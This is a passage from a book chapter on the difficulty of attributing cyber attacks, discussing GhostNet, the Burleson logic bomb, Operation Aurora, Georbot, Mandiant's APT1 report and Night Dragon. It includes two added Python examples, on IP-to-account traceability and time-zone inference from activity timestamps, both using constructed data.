Such remote administration tools are openly available on the Internet, maintained as openly available backdoors by loosely organized hackers. One such hacker group, Wolfexp, even made videos available in Chinese on how to use their tool to take over targeted machines remotely, complete with grainy screenshots of unsuspecting web users to illustrate the potency of their spying program. 10 This means that the tools to execute GhostNet were openly available as well as relatively easy to use. The social engineering part of the attack was sophisticated, but the operation, in contrast to more tailored and more complex attacks such as Stuxnet or Flame, most likely did not require the intelligence, the resources, or the skills that only a nation-state could muster. This raises the question of attribution. The highly detailed Canadian report pointed out that the targets reflected China’s security priorities, especially Tibet and Taiwan. And the IP addresses that were used to launch the attack were located on Hainan, an island in the South China Sea with a population of about 8 million people and home to a large signals intelligence base, just west of Lingshui Air Base. One of the main tasks of this intelligence base is monitoring satellite communication. Lingshui is one of Asia’s most important intelligence bases and it reportedly houses more than 1,000 intelligence analysts working for the PLA’s much larger Third Technical Department based near Beijing. Deibert’s team was careful not to point the finger directly at the Chinese government because the uncovered evidence was inconclusive: “we do not know the motivation or the identity of the attacker(s),” the highly detailed and thorough Canadian report said. 11 The authors of the much shorter University of Cambridge report were less careful in their wording: “it was a targeted surveillance attack designed to collect actionable intelligence for use by the police and security services of a repressive state, with potentially fatal consequences,” they wrote. 12 Despite all this technical evidence, it remains unclear if the Chinese government, intelligence agencies, or the military were directly responsible for the operation. China’s government denied the accusations through its embassy in London.

Attribution, in the context of computer attacks, has several layers. The first layer is technical. The Internet is a so-called packet-switched network. A packet is a slice of a larger piece of information, for instance an email, a website, a Word document, or a piece of malware. 13 Finding malicious packets or malicious functionality is a forensic problem. The forensic goal, in starkly simplified terms, is to trace malicious activity to an IP address. The second layer is social. The difficulty is connecting a machine to a human user. If an individual used an open WiFi network, stole a computer including its Internet connection, or never left any traces that personally and geographically would identify the user’s identity, the second layer is very hard, if not impossible, to penetrate. The third layer is political. If the Internet was confined to a territory where one entity has a monopoly of force, the attribution problem could be solved much more easily. 14 Suppose online fraud at a London bank was committed from a specific IP address, say 80.4.248.191, on 5 September at 21:09. Scotland Yard would then be able, through a simple WHOIS lookup, to trace the IP address to a postal address registered in Bartley Wood Business Park in Hampshire in the United Kingdom, the registered address of Virgin Media Ltd, one of Britain’s leading ISPs. 15 The London police authorities could request, and possibly subpoena, Virgin Media to reveal information from its log files to identify which of the ISP’s individual customers had used that particular address on 5 September at quarter past nine. Virgin is required by English law to keep this data. The police could then simply knock at the suspect’s door and confiscate his computer. But reality often works differently. 16 The lookup of a fraudulent transaction on 5 September at 21:09 may lead to 217.66.19.45, with an unidentified host and an unidentified owner in the Russian Federation. The London police could then request authorities in Russia to investigate—if the Russian authorities cooperate, if they identify the ISP correctly, and if the ISP provides the log files, they may find the relevant traffic was encrypted and routed through yet another country that may or may not cooperate. And so on. Already this oversimplified example shows that what appears to be a technological problem soon morphs into a political one, creating conditions that require foreign authorities to cooperate swiftly before logs are lost, if ISPs keep log files at all, which they may not be legally required or willing to do. Needless to say, in the case of political cyber attacks, especially economic espionage, some foreign political authorities may have no interest in cooperating at all. The more clearly an attack is of a purely for-profit criminal nature, the less political the attribution problem will become, and continued investigation will depend more on the criminal justice system of a particular country.

But even in real-life criminal cases, the technical picture is far more complex. Richard Clayton of Cambridge University prepared one of the most detailed and comprehensive studies on attribution, although he rarely used the term in the report. His analysis focuses on “traceability” on the Internet. Anonymity is present when traceability fails, in Clayton’s words. 17 The computer scientist discussed traceability in four simplified steps: determining the IP address that is to be traced; establishing the Internet Service Provider, which could be an independent non-commercial entity like a government or university; identifying the user account in the ISP’s records; and finally connecting the actual identity of the responsible individual that operated a specific account at a specific time. On each step along the way of traceability, there can be obstacles that are impossible to overcome. As the Internet became more complex and dynamic at the turn of the millennium, the possibilities for obscuring traceability increased, even on a purely technical level. Clayton concluded that the future will bring even more uncertainty. “Quite clearly there will be many more examples of traceability problems to understand, explain and perhaps even fix.” In addition, the presently used techniques are already less reliable than often assumed. “Far too many of the systems that underpin traceability are far less accurate than anyone really imagines,” Clayton wrote, adding a warning:

There is a real risk of significant miscarriages of justice should traceability start being seen as “evidence” rather than “intelligence” and it is vital to educate Law Enforcement and Governments on the limitations of traceability—whilst still accepting that a great deal of the time it is perfectly possible to work out “who did that” and smash down the right door. 18
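
The three layers of attribution sketched earlier and Clayton’s four traceability steps describe the same pipeline: an address, the network responsible for it, the account that held it at a given moment, and only then a person. The code below walks that pipeline over constructed records as an added example written for this page; it is neither the book’s nor Clayton’s code, and the allocation table, the lease records, the provider names and the account identifiers are all made up. It deliberately returns a list of candidate accounts rather than one answer, because a lease change near the event time, or a clock that is a couple of minutes off, is exactly how traceability quietly turns from evidence into intelligence.

```python
"""Walk Clayton's traceability steps over constructed records.

Steps: the IP address to trace -> the responsible network (a WHOIS-style
lookup) -> the account in the provider's lease records -> the person, which
no script can supply. Everything here is constructed for illustration; no real
provider data or real address allocation is used.
"""
from datetime import datetime
from ipaddress import ip_address, ip_network

# Step 2 lookup table, constructed. Real work would query a RIR WHOIS service.
ALLOCATIONS = {
    ip_network("203.0.113.0/24"): "ExampleNet Ltd (constructed ISP, UK)",
    ip_network("198.51.100.0/24"): "Unnamed hosting provider (constructed, RU)",
}

# Step 3 input, constructed lease/RADIUS records: (ip, start, end, account).
# Note the lease change on 203.0.113.7 at 21:10, one minute after the event.
LEASES = [
    ("203.0.113.7", "2012-09-05T18:00:00", "2012-09-05T21:10:00", "acct-1042"),
    ("203.0.113.7", "2012-09-05T21:10:00", "2012-09-06T03:00:00", "acct-2288"),
    ("203.0.113.8", "2012-09-05T12:00:00", "2012-09-06T12:00:00", "acct-3001"),
]


def responsible_network(ip):
    """Step 2: which allocation covers the address? None if we hold no record."""
    addr = ip_address(ip)
    for net, holder in ALLOCATIONS.items():
        if addr in net:
            return holder
    return None


def accounts_for(ip, when, clock_skew_s=0):
    """Step 3: accounts holding `ip` at `when`, widened by the log's clock skew.

    Returns a list rather than a single account: a lease change close to the
    event, or a shared address, legitimately yields several candidates.
    """
    t = datetime.fromisoformat(when).timestamp()
    lo, hi = t - clock_skew_s, t + clock_skew_s
    found = []
    for lease_ip, start, end, acct in LEASES:
        if lease_ip != ip:
            continue
        s = datetime.fromisoformat(start).timestamp()
        e = datetime.fromisoformat(end).timestamp()
        if s <= hi and lo < e:  # lease interval [s, e) overlaps [lo, hi]
            found.append(acct)
    return found


def trace(ip, when, clock_skew_s=0):
    """Run the steps and return the network holder plus account candidates."""
    holder = responsible_network(ip)
    if holder is None:
        return {"network": None, "accounts": [], "verdict": "no allocation record"}
    accts = accounts_for(ip, when, clock_skew_s)
    if len(accts) == 1:
        verdict = "single account; still intelligence until corroborated"
    elif accts:
        verdict = "ambiguous: %d candidate accounts" % len(accts)
    else:
        verdict = "no lease record for that time"
    return {"network": holder, "accounts": accts, "verdict": verdict}


if __name__ == "__main__":
    event = "2012-09-05T21:09:00"  # constructed event time
    print(trace("203.0.113.7", event))                  # one candidate
    print(trace("203.0.113.7", event, clock_skew_s=120))  # two candidates
    print(trace("198.51.100.5", event))                 # foreign provider, no logs
    print(trace("192.0.2.1", event))                    # nothing known at all
```

With a perfectly synchronised clock the trace names one account; allow two minutes of skew between the bank’s log and the provider’s RADIUS server and the same query returns two. The fourth step, tying an account to the hands on the keyboard, is outside what any record lookup can deliver, which is Clayton’s point.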

Looking at a simple historical case where these technical complexities do not apply brings the basic features of attribution into relief. Even in the best-documented court cases where a criminal made mistakes, motivations are known, and detailed supporting evidence is available, attribution may still not be a certainty. This is ideally illustrated by the Burleson case, the very first felony conviction for the malicious use of software in American history. It played out in 1985, and it did not involve any remote network intrusion. The software systems at the time were much simpler—the malware in question was developed for an IBM System/38, a server platform at least as big as two washing machines, which was commercially available as early as 1979. The machine had a working memory of 1MB, 1,000 times less than the working memory of a 2012 iPhone. From a purely technical point of view, the case was therefore vastly simplified.

On the morning of 21 September 1985, a programmer came into the Fort Worth, Texas, offices of the United Services Planning Association and its subsidiary, the Independent Research Agency for Life Insurance. The company and its 450 agents sold insurance to US military personnel. 19 The programmer had come to run tests on a new bonus system. As he tried to run simulations on the payroll file, the results repeatedly came up with zeros. It turned out that 168,000 commissions’ payroll records had been deleted. The monthly volume of those payrolls averaged $2 million. A log file from 21 September 1985 showed that a terminal had been fired up at 03:03 in the morning. Somebody had physically broken into the offices and caused the damage. The subsequent forensic investigation found that a sequence of malicious scripts had been implanted into the IBM system three weeks before that break-in. A forensic analysis found that an employee with privileged access had rigged the system over Labor Day, 2 September 1985. That employee allegedly wrote a number of scripts that would be clandestinely inserted into a legitimate program that ran a routine every day. One of the malware’s modules, ARF-1, checked the timestamp every time the legitimate program was running. When the date matched, ARF-1 triggered a series of other scripts that then resulted in overwriting the commissions’ payroll records. Among forensic experts, the case is also known as one of the first documented “logic bombs.” 20

The main suspect was Donald Gene Burleson, known as a quarrelsome and unpleasant colleague. The forty-year-old programmer had been fired just two days before the break-in. So Burleson had the motive and the means to commit the crime. Yet there were other suspects. The evidence in the monumental trial was not conclusive, and the jurors were in doubt and ready to acquit the defendant. Then, however, Burleson made the mistake of trying to come up with an alibi, which blew up in his face. After the jury returned to the courtroom with the guilty verdict, one juror reportedly told another, “If Burleson had just said he couldn’t remember where he was that day, I would have voted for him. The state really didn’t prove anything. But why did he have to lie?” 21 The trial concluded on 19 September 1988. It was the first case in American history in which the defendant was charged with the malicious destruction of files. “As far as I know, it’s the first case of this type in the nation,” explained Tarrant County Assistant District Attorney Davis McCown at the time. “We’ve had people stealing through computers, but not this.” 22 McCown had spent almost three years on the case. In the end, Burleson did not have to go to prison; he received seven years on probation and had to pay $11,800 in restitution to the USPA. Burleson was convicted not under a federal law, but under the Texas Penal Code, section 33.03, act of 14 June 1985.

Another, vastly different malware incident complements the Burleson case, and enables an insightful comparison between a well-documented domestic case and a well-documented international case. On 12 January 2010, Google disclosed in a post on its corporate blog that it had become the subject of a sophisticated cyber attack. “In mid-December, we detected a highly sophisticated and targeted attack on our corporate infrastructure originating from China that resulted in the theft of intellectual property from Google,” the company announced. 23 Initially Google engineers had suspected an individual security incident, albeit an especially sophisticated one. But during an investigation they discovered that the attack was “something quite different.” Google announced that two email accounts of Chinese human rights activists had been hacked, not by stealing the login credentials from the user, but by penetrating Google itself. It also became evident that intellectual property was stolen.

The hack followed a by now familiar pattern: first a specific Google employee would be identified. Then that user would receive an email from a trusted source with a link. When the unsuspecting employee followed that link, he or she would be directed to a website hosted in Taiwan. This site contained malicious JavaScript code. If the Google employee was using Internet Explorer, the site would exploit a zero-day vulnerability to inject the payload in the form of a binary file disguised as an image. Next the malicious code would open a backdoor and set up a hidden communication to command-and-control servers in Taiwan. Only then did the attackers play their trump card. The Aurora hackers had devised a method to gain access to Google’s software configuration management system (SCM), in this case an installation of Perforce, a platform widely used by large software developing companies. Vulnerabilities in such source code management systems were not widely known at the time, but are relatively easy to exploit. 24 Gaining clandestine access to a company’s source code is the holy grail of cyber attacks: it would give the intruder the power not just to pilfer proprietary programming code, but to make changes to the source code, for instance to install a secret peephole that would be passed on to trusting customers of Google or Adobe products. Aurora had the look and feel of a sophisticated bank shot across Mountain View to pocket dissidents at home. Yet the attack could also have an economic motivation.

Its sophistication and the suspected mixed motivation made the attack highly unusual. The attacker’s motivation for the intrusion into the systems of the Californian search giant seemed to combine international economic espionage as well as domestic political surveillance of activists. That pattern was not limited to one target, Google. What became known as Operation Aurora targeted at least thirty-four leading US companies from various sectors, among them Yahoo!, Symantec, Adobe, Northrop Grumman, and Dow Chemical. 25 (There are not that many Chinese dissidents who happen to have email accounts with Northrop Grumman or Dow Chemical, it should be noted.) Aurora, unusually, was a multi-purpose attack. It exploited a previously unknown vulnerability in Microsoft’s Internet Explorer. Once inside an organization, the attackers used another clever technique, called man-in-the-mailbox—a pun on man-in-the-middle attacks—where an attacker would send emails that allegedly came from trusted colleagues, thus tricking others into opening attachments.

Attempts to attribute Operation Aurora yielded unexpectedly detailed results. The National Security Agency participated in a detailed investigation. The origin of the attack was traced to two Chinese schools that train computer scientists. One was Shanghai Jiaotong University, which runs one of China’s top computer science programs. Students at Jiaotong had recently won a well-known computer science competition, the so-called Battle of the Brains, sponsored by IBM since 1997, surpassing 103 of the world’s top universities, including US institutions such as Stanford University. The New York Times interviewed academics on Jiaotong’s faculty. “I’m not surprised. Actually students hacking into foreign Web sites is quite normal,” one professor said anonymously (ironically he also didn’t want to be attributed for fear of reprisal from the school). He then offered two scenarios:

I believe there’s two kinds of situations. One is it’s a completely individual act of wrongdoing, done by one or two geek students in the school who are just keen on experimenting with their hacking skills learned from the school, since the sources in the school and network are so limited. Or it could be that one of the university’s IP addresses was hijacked by others, which frequently happens. 26

The other school was Lanxiang Vocational School in East China, which was established with military support. The head of Lanxiang’s computer science department doubted the school’s involvement, and argued, plausibly, that the Aurora attacks were too sophisticated for Lanxiang’s students:

I think it’s impossible for our students to hack Google or other US companies because they are just high school graduates and not at an advanced level. Also, because our school adopts close management, outsiders cannot easily come into our school. 27

Even five weeks after Google made the attack public, the Times, and much of the world, could only guess and assume that Aurora had been a Chinese state-sponsored attack. Most likely the attack had only been routed through the schools’ servers, which are often badly protected, in order to deflect attention from the actual attacker. Behind closed doors however, the US government already had more information about the attack, just ten days after the story broke. On 22 January, a political officer in the US embassy had a confidential conversation with Chen Jieren, the editor of a Communist Youth League website. That editor was also the nephew of He Guoqiang, a Politburo Standing Committee member and thus a senior and well-placed government official. Chen revealed that the attack was coordinated by the State Council Information Office and overseen by two other Politburo members, Li Changchun and Zhou Yongkang. 28 Information about the attack appeared to be closely held by them, and only after Google made the announcement on its blog was the operation discussed more widely in the party. It therefore remained unclear if China’s president, Hu Jintao, as well as Prime Minister Wen Jiabao, had been aware of the attack against Google. What also remained vague was the attack’s motivation. Chen insisted that the operation was “one hundred percent” political and designed exclusively to spy on Chinese dissidents. But the former CEO of Google China told the US embassy that Li Changchun, one of the attack’s masterminds, was actively supporting the country’s main search company Baidu against Google, its biggest competitor. Verisign, a leading Internet security company that also runs two of the web’s thirteen root servers, has detailed knowledge of China’s online activities. In an unpublished 2011 report, Verisign considered it “probable” that “state agencies” from the People’s Republic of China were behind Aurora. Operation Aurora, it should be noted, is one of the best-attributed political cyber attacks on record—and the group behind Aurora has been continuing its operations for years, mostly against targets in the defense, shipping, aeronautics, and energy sectors, but also against NGOs and human rights organizations. No other hacking group has used more zero-day exploits than this group, dubbed the “Elderwood Project” by Symantec, approximately eight between 2009 and 2012. 29

A third example offers a Tom Clancy-style story of solving the attribution problem: active defense, which in this case meant hacking back. The case is known as “Georbot.” Georbot began unfolding in Georgia in early 2011. The country’s troublesome relationship with Russia had expressed itself in military confrontations as well as in hacking attacks before, most recently in 2008. Then, nearly three years later in March 2011, a suspicious file on the computer of a government official came to the attention of the Georgian CERT. “Dr. WEB,” a Russian anti-virus scanner, had flagged up the allegedly corrupted file. Georgian computer experts soon discovered that unknown hackers had infected between 300 and 400 computers across six government agencies. The machines formed a Georgia-focused botnet, hence the case’s nickname. The intruders were obviously looking for political information: the malware was primed to search for obvious keywords in Microsoft Word and PDF documents, almost in a naive way, for instance for “USA,” “Russia,” “NATO,” or “CIA.” 30 When a document met the search criteria, it was copied to command-and-control servers from which the attackers would move the document to their own computers, and then delete the dropped file on the interim server. The intrusion evolved over time and the attackers added functionalities. They were able to clandestinely exfiltrate screenshots and recorded audio material—but for once the trick backfired. The case took an odd turn when the Georgian government cut off the command-and-control servers. The hackers didn’t stop, but changed their methods. They knew they had been discovered, so they presumably decided to increase the stealthiness of their spying operation. The attackers did so by using a PDF vulnerability that was not publicly known at the time. 31 As usual, the intruders would trick unsuspecting users into opening a compromised email attachment to penetrate a network. But the address they used, admin@president.gov.ge, was suspicious. When the Georgian CERT started digging into the details, they found circumstantial information that possibly implicated Russian intelligence agencies. The spam service that was used to send the fake emails, legalcrf.in, led to a name, cover company, and street address in Moscow: Artur Jafuniaev, WSDomains, Lubianka 13, 346713 Moscow—the street address of the Russian Ministry of Internal Affairs, which is next to the Federal Security Service of the Russian Federation, FSB. The Georgians decided to take action and set up a honeypot, not just for research purposes, but to hack back. The Georgian experts offered the attacker an appropriately named target document that was itself infected. The CERT’s highly technical report described the operation in broken English:

We have Infected our PC from Lab, then gave Cyber Attacker Fake ZIP Archive with his own virus inside and the name “Georgian-Nato Agreement.” 32

The Russian hackers indeed stole the fake Georgian-Nato Agreement, opened it, and unknowingly executed the document’s embedded payload. This allowed the Georgians to maintain control of the hacker’s PC for at least ten minutes. That was enough time for the Georgian government team to dig into their victim’s computer. They were able to obtain one document, written in Russian, that detailed further plans to attack more targets. Most remarkably, though, the Georgian CERT managed to switch on the hacker’s own webcam and film a short video of him: “We had maintained control over his PC,” the official report stated in raw English, “then captured got video of him, personally. We have captured process of creating new malicious modules.” Their target presumably noticed the ruse after a short while and switched off access. But it was too late. The Georgian government’s official report, highly unusually, contained two photos of the unknown Russian hacker. It shows a skinny, mustachioed man with dark hair, perhaps in his 30s, hunched over the screen, typing, while sitting in a neon-lit residential apartment with a trashy interior design. Yet his name and affiliation ultimately remained unclear: the Georgian CERT could hardly count on the on-the-ground support of Moscow law enforcement authorities to verify their suspicions.

The Georbot incident is probably the only detailed example of a successful case of active attribution in the public domain. But perhaps its most unusual feature is the fact that the Georgian government made the information public. Most intelligence agencies and their governments are highly reluctant to publicize such operations, for that could reveal vulnerabilities, tactics, skills, and create potential political blowback. Yet, if a small and technologically limited agency like Georgia’s Ministry of Justice can pull off an active attribution operation in a legally grey area, then the assumption is reasonable that mighty and highly specialized intelligence agencies of the world’s most technologically sophisticated powers can achieve a much higher degree of attribution. But by no means does this mean that Leon Panetta’s cocky general statement about solving the attribution problem can be taken at face value.

One crucial limitation of attribution comes to the fore if intelligence is distinguished from the narrower concept of evidence. In criminal justice as well as in some scientific disciplines, the standards of evidence are clearly defined. In the legal systems of the United Kingdom as well as the United States, the highest threshold of proof is “beyond reasonable doubt,” a long-used term in criminal justice. Proof is beyond reasonable doubt if the available evidence (or the absence thereof) logically implies the incriminating facts, based on reason and common sense. This criterion must be met in any criminal trial if the defendant is to be pronounced guilty—if it is not met, the judge or jury will acquit the defendant. Lower standards of proof are possible in civil litigation, for instance “preponderance of the evidence,” which means that one side has more evidence in its favor than the other side. In intelligence collection and analysis, the standards of proof are less clearly defined—and they are necessarily lower than “beyond reasonable doubt.” Most intelligence collection takes place in hostile and less permissive environments than the hands-on, on-the-ground collection of forensic evidence on a crime scene, particularly in the case of intelligence on ongoing computer breaches. It is therefore unrealistic and unreasonable to hold intelligence to the same standards of proof as the evidence produced in criminal trials. The following story vividly illustrates this problem.

In 2004 Jack Wang was an ambitious young man in his early 20s with a keen interest in military affairs and a notable nascent skill in hacking. He was also a Chinese patriot. On 16 January that year, Wang attended an online question-and-answer session hosted by the PLA Daily’s China Military Online, at chinamil.com.cn. The forum offers its users the option of a profile picture. Wang chose a glossy picture of air force-style insignia that depict a golden star adorned with hammer and sickle sitting on golden eagle wings, with the caption “junior pilot.” The guest on the forum was Zhang Zhaozhong, a military theorist and now retired rear admiral. That Friday he took part in a hosted event, “Outlook 2004,” to discuss China’s international strategic situation. At the time Zhang was a professor at the PLA’s National Defense University in Beijing. One of his books, Network Warfare, was popular among students. Casually seated in a civilian black turtleneck in front of a large screen, Zhang responded to the questions that were coming in from his online audience. Jack Wang, the would-be pilot, was logged in as UglyGorilla. He asked a rather prescient question:

Professor Zhang, I read your book Network Warfare and was deeply impressed by the views and arguments in the book. It is said that the US military has set up a dedicated network force referred to as a “cyber army.” Does China have a similar force? Does China have cyber troops? 33

Wang soon had the answer. That same year, it turned out, he would join the growing ranks of China’s cyber troops by becoming a member of PLA Unit 61398, henceforth using that same pseudonym in many of his hacking sprees. The infamous unit was part of the PLA’s cyber command, situated in the General Staff Department (GSD), specifically the 3rd Department, 2nd Bureau, which operates under the Military Unit Cover Designator 61398. Just ten months after his online Q&A session with the professor, on 23 October, Wang registered hugesoft.org, a URL that over the next nine years would continuously be used to facilitate sophisticated computer spying operations against western and especially American targets. Wang was one of hundreds if not thousands of military spies busily pilfering secrets from abroad. He often signed his work with a clearly notable autograph in the code, in the self-assured style of an artist signing his painting: “v1.0 No Doubt to Hack You, Writed by UglyGorilla, 06/29/2007 [sic].” 34

By 2007, Unit 61398 had grown so much that the PLA constructed a large but nondescript twelve-story office building off Datong Road, in Gaoqiaozhen, in Shanghai’s Pudong New Area. Pudong on its own is a sprawling metropolis of 5 million, twice the population and twice the area of Chicago, with a world-famous skyline. Over a period of seven years, Jack Wang’s group worked on brazen intrusions against at least 141 organizations in twenty different industries, including the Coca-Cola hack mentioned earlier. On average, the Chinese army hackers maintained access to their victims’ computer networks for almost one year at a time, 356 days to be precise. The longest breach continued for four years and ten months. Unit 61398 drained gigantic amounts of data from its victims, in the case of one unidentified organization 6.5 terabytes over a ten-month period. The group used at least 937 command-and-control servers that were hosted on 849 distinct IP addresses, with the majority registered in China. When Wang’s group attacked a target, they almost never connected directly from Shanghai but instead “hopped” through various nodes to cover their traces. The unit’s vast and growing espionage campaign created its own administrative and logistical challenges. In 2009, China Telecom even had to provide a dedicated high-speed fiber-optic line to the new building.

This remarkably detailed story is based on intelligence, not evidence that would meet the beyond-reasonable-doubt test. Most of these details were revealed in a seventy-four-page report, simply titled APT1, published on 19 February 2013 by Mandiant, an American security firm that has investigated hundreds of security breaches at organizations worldwide. The study is the most significant publicly available document that attributes major espionage operations to a Chinese entity. Mandiant’s path-breaking report focused on one specific group, APT1, shorthand for Advanced Persistent Threat 1, alternatively known as Comment Crew or Comment Group. The report—and Jack Wang’s story as recounted here—made several major links that were based on estimations of various degrees of certainty. The first link was that it bundled 141 attacks and attributed them to APT1. This connection could reasonably be made with a high degree of certainty on the basis of digital forensic evidence, for instance the attack methodology, the type of software used, or specific tools and techniques that have not been used by others.

A second link concerned the mission of Unit 61398. The difference between passive intelligence gathering and active computer network attack is subtle but important. The source that Mandiant cited in its report merely estimated that Unit 61398 is in the business of intelligence gathering, not necessarily computer network attack. 35 Consequently, the fact that China Telecom upgraded the unit’s fiber-optic infrastructure does not inevitably imply that it was used to support a larger volume of high-profile attacks. The installation could merely reflect that the company is a legitimate contractor for the PLA, and possibly that the new data link was used for passive intelligence gathering, either of domestic or international nature.

But the report’s most explosive claim rested on a third link: that APT1 is PLA Unit 61398. The proof for this third link is far more difficult. It relied on circumstantial evidence. The first piece of intelligence was that one of the “personas” that the report described, similar to the story of UglyGorilla above, identified himself as a local of Shanghai’s Pudong New Area. The second piece of intelligence was that the IP addresses used by APT1 originated partly in Pudong: “Although they control systems in dozens of countries, their attacks originate from four large networks in Shanghai—two of which are allocated directly to the Pudong New Area,” the report found. Unit 61398 is also in Pudong. Therefore, Mandiant’s computer security specialists concluded, the two were identical: “Given the mission, resourcing, and location of PLA Unit 61398, we conclude that PLA Unit 61398 is APT1.” 36 But conspicuously the report did not mention that Pudong is not a small neighborhood (“right outside of Unit 61398’s gates”) 37 but in fact a vast city landscape twice the size of Chicago. 38

The lack of caution and nuance in the report’s black-and-white conclusion unfortunately undermined its credibility more than it bolstered its important case. Since at least the 1960s intelligence analysts have been conscious of their estimative language. Major intelligence failures in the wake of the Iraq invasion of 2003 have made the intelligence communities in the UK and the US far more cautious in their assessments and more nuanced in the language used to convey the quality and certainty of the available intelligence to their political masters. 39 In the intelligence profession, this communication problem has long been known as Words of Estimative Probability. 40 Computer security companies should heed the spies’ insights. Nevertheless the Mandiant study cannot be dismissed out of hand, as the Chinese government tried to do in its official response. The standards of proof that can be achieved in an intelligence operation without human sources on the ground, let alone without support by local law enforcement agencies, are bound to be lower than ideal—but estimates that are “probable” or “almost certain,” to use two of the highest gradations of intelligence, may still be sufficient to take meaningful political action, even action with serious consequences.

The brief consideration of four rather different yet highly instructive cases—Burleson, Aurora, Georbot, and the Mandiant report—allows two important generalizations. One is that the attribution problem is almost never perfectly solved: attributing identity without an agent claiming credit or confessing nearly always entails a call of judgment. That is the case even in a highly simplified scenario like the Burleson incident and the subsequent trial. It is also the case in a complex and international high-stakes attack like Operation Aurora. Another generalization: to achieve even imperfect attribution, supplemental non-technical evidence, or at least intelligence, is required. And that evidence has to come from human sources or witnesses. In the context of a state-sponsored attack, one added difficulty arises in identifying the agency and the level of leadership that ultimately has the responsibility for an operation. Again a short comparison with conventional military operations is instructive. In the case of the conventional use of force, both the responsible agencies and the levels of authorization are historically well established, although in specific cases there may be significant uncertainty. For cyber attacks, the situation is again reversed. Uncertainty and a lack of orientation are the norm, not the exception.

Yet it is crucial to note that these four relatively well-documented cases are the exception, not the rule. In the majority of cases of cyber espionage, the attribution problem has the unpleasant effect that even the most fundamental insights remain clouded in mystery, including the specific motivation of the attack. Two short examples illustrate this shortfall. The first example is a series of attacks uncovered about a year after Aurora, in February 2011. In an operation that became known as “Night Dragon,” unknown intruders attacked a number of global energy and petrochemical companies along with individuals and business executives in Kazakhstan, Taiwan, Greece, and the United States. 41 When it was discovered, the attack had already been underway for more than a year, since November 2009. The intruders started this hack by going after the companies’ external web servers, using attack tools such as SQL-injection or remote administration tools that were readily available on illicit forums online, for instance on http://rootkit.net.cn. Once inside, the online spies used a variety of techniques to hop from machine to machine on a company’s internal network. The intrusions appeared to have been staged by a small group of attackers, perhaps of a dozen or fewer people. The records show that the attack took place during regular office hours, between 9 a.m. and 5 p.m. Beijing time during the workweek, indicating that it was the work of professionals, not hackers. “These were company worker bees, not freestyle hackers,” said Dmitri Alperovitch, then at McAfee. 42 Yet such details are not evidence—at best, they are shoddy intelligence. Stewart Baker, a former assistant secretary at the Department of Homeland Security, pointed out how difficult it is to draw clear conclusions. The intrusion of oil and gas companies, he said, “could well be [the] Chinese government, but I can’t say the government would even have to be aware of it.” Baker then speculated that the intruders’ motivation may well have been economical, not political. “The most valuable intelligence in the commercial world may be what oil exploration companies have found and not found,” he told the Financial Times. 43 McAfee, who broke the news on the attack, was appropriately careful to warn that attribution was difficult: “Important: McAfee has no direct evidence to name the originators of these attacks but rather has provided circumstantial evidence.” 44
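The office-hours pattern described above, activity clustered between 9 a.m. and 5 p.m. Beijing time on weekdays, is one of the few attribution heuristics an analyst can check mechanically rather than intuitively. The following is an added example, not code from the book, from McAfee or from any of the firms named in this chapter: given a list of intrusion activity timestamps in UTC (such as first-seen times of web-server requests or command-and-control check-ins pulled from proxy logs), it scores every candidate UTC offset by how many events that offset would place inside a weekday 09:00 to 17:00 window, and reports the best fit together with an hourly histogram. The timestamps are constructed for the example, and the function names are the example's own.

```python
"""Infer an intrusion operator's likely working-hours time zone from the UTC
timestamps of their activity. Added example; the sample timestamps below are
constructed for illustration, not real Night Dragon data."""
from collections import Counter
from datetime import datetime, timedelta, timezone

# Constructed sample: UTC timestamps of attacker activity, e.g. first-seen
# times of web-shell requests or C2 check-ins taken from proxy logs.
# 2010-03-01 is a Monday; 2010-03-06 is a Saturday.
EVENTS_UTC = [
    "2010-03-01T01:12:00Z", "2010-03-01T03:40:00Z", "2010-03-01T08:55:00Z",
    "2010-03-02T02:05:00Z", "2010-03-02T05:30:00Z", "2010-03-02T07:48:00Z",
    "2010-03-03T01:50:00Z", "2010-03-03T04:15:00Z", "2010-03-03T06:22:00Z",
    "2010-03-04T02:30:00Z", "2010-03-04T03:58:00Z", "2010-03-04T08:10:00Z",
    "2010-03-05T01:05:00Z", "2010-03-05T05:45:00Z", "2010-03-05T07:20:00Z",
    "2010-03-08T02:14:00Z", "2010-03-08T04:33:00Z", "2010-03-09T06:01:00Z",
    "2010-03-10T03:27:00Z",
    "2010-03-06T14:00:00Z",  # Saturday afternoon UTC: an outlier event
]

# Local office hours assumed for a "worker bee" operator: 09:00 <= hour < 17:00.
WORK_START, WORK_END = 9, 17


def parse_utc(ts: str) -> datetime:
    """Parse an ISO-8601 'Z' timestamp into an aware UTC datetime."""
    return datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)


def office_hours_fraction(events, offset_hours: int) -> float:
    """Fraction of events that land on a weekday inside office hours when the
    clock is shifted by offset_hours from UTC. Empty input scores 0.0."""
    if not events:
        return 0.0
    tz = timezone(timedelta(hours=offset_hours))
    hits = 0
    for ts in events:
        local = parse_utc(ts).astimezone(tz)
        # weekday(): Monday == 0 ... Sunday == 6; keep Monday to Friday only.
        if local.weekday() < 5 and WORK_START <= local.hour < WORK_END:
            hits += 1
    return hits / len(events)


def score_offsets(events, offsets=range(-12, 15)):
    """Return {utc_offset_hours: office_hours_fraction} for every candidate."""
    return {off: office_hours_fraction(events, off) for off in offsets}


def best_offset(events) -> int:
    """Offset whose office-hours window explains the most events. Ties go to the
    offset nearest UTC so the answer is deterministic; callers should still
    inspect score_offsets() to see how close the runners-up are."""
    scores = score_offsets(events)
    return max(scores, key=lambda off: (scores[off], -abs(off)))


def local_hour_histogram(events, offset_hours: int) -> Counter:
    """Count events per local hour of day at the given offset, for eyeballing
    whether the activity really looks like a working day."""
    tz = timezone(timedelta(hours=offset_hours))
    return Counter(parse_utc(ts).astimezone(tz).hour for ts in events)


if __name__ == "__main__":
    off = best_offset(EVENTS_UTC)
    frac = office_hours_fraction(EVENTS_UTC, off)
    print(f"best-fitting offset: UTC{off:+d} "
          f"({frac:.0%} of events inside weekday office hours)")
    for hour, n in sorted(local_hour_histogram(EVENTS_UTC, off).items()):
        print(f"{hour:02d}:00  {'#' * n}")
```

On the constructed data the best fit is UTC+8 with 19 of 20 events inside office hours; UTC+7 and UTC+9 score lower because events at the edges of the day fall outside the window. That is exactly the kind of result the text calls shoddy intelligence rather than evidence: it is consistent with an operator working a Beijing office day, but so are several other UTC+8 locations, scheduled tooling can mimic any working pattern, and a single outlier or a daylight-saving shift in the operator's locale will blur the one-hour boundaries. Treat the best offset as a hypothesis to corroborate, and always look at the neighbouring offsets' scores before reading a time zone as a country.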
